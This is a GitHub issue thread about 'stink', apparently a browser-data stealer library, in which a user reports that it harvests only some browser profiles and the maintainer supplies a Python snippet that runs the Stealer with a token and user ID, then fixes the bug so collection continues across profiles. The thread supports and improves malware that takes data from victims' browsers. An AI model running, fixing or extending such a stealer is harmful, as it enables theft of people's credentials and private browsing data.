### ISSUE TITLE
Problem with collecting data from multiple profiles

### ISSUE THREAD

**Issue by pyobfus** [FallenAstaroth/stink#42]
Occasionally, stink doesn't collect enough data from the browser. For example, my browser has up to 10 profiles, but stink only collects about 2 profiles. This problem is very common. Can you explain it to me?

**Comment by FallenAstaroth** [comment]
Are you sure the other profiles have data to collect? Try adding error output.

Example:
```python
from stink import Stealer
from stink.enums import Utils

if __name__ == '__main__':
    Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, utils=[Utils.errors]).run()
```

**Comment by FallenAstaroth** [comment]
It seems that data collection was really interrupted if it did not find at least one of the files. I fixed this problem, update your stink and test again.

**Comment by pyobfus** [comment]
it's working fine. THX
